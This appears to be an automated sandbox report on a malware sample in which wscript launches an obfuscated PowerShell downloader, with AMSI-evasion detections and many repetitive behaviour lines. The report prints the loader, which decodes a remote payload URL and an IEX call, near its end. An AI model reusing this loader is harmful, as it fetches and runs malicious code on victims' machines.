gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:Dagbr Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B70812B push ebx; ret 4_2_00007FFD9B70816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7D7BFD push esp; ret 4_2_00007FFD9B7D7BFE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7D7023 pushad ; ret 4_2_00007FFD9B7D7025
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7D7F93 push ecx; ret 4_2_00007FFD9B7D7F94
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7D7944 push edi; ret 4_2_00007FFD9B7D7945
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_043942D9 push ebx; ret 9_2_043942DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_0439B470 push 0000006Dh; ret 9_2_0439B4A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_04393711 push esp; iretd 9_2_04393751
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_0722C35C push esp; ret 9_2_0722C35D
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5558 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4364 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6694 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3150 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000004.00000002.2138100600.000002CC9D367000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.4232905007.0000000007035000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_029EDAAC LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk, 9_2_029EDAAC

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: amsi64_7468.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7468, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7936, type: MEMORYSTR
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677e Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:Dagbr Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677e Jump to behavior
